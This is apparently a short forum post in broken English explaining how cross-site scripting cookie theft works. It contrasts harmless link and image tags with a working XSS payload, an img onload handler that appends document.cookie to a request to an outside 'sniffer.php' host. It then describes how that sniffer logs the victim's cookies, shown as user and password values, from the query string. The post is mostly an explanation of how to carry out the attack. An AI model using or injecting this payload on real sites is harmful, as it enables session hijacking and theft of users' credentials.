this <a href="http://myhost/s.jpg?it is test">click me</a> and this
<img src="http:/myhost/s.jpg">
is not a cookie stealing codes. because cookie stealers use JAVA scripts. The Cookies cames to haker in QUERY STRING.
in
http://bbs.com/news.php?news_id=6&print=on query string is "news_id=6&print=on".
The cookie sniffer SAVE all query strings that connect to him.
IF user's cookie is
user=Mike;password=xxx
JAVA script replace +document.cookie in
<img src='http://ya.ru/logo.gif' onload='i=new Image();i.src="http://www.gfdfdgdfg/?"+document.cookie;'>
for real cookies from user's browser and connect to
http://www.gfdfdgdfg.com/sniffer.php?user=Mike;password=xxx browser think that it is a image, but don't display it.
YOU SEE. QUERY_STRING is
?user=Mike;password=xxx it will be saved by your SNIFFER
http://www.gfdfdgdfg.com/sniffer.php
Sorry for bad, bad English.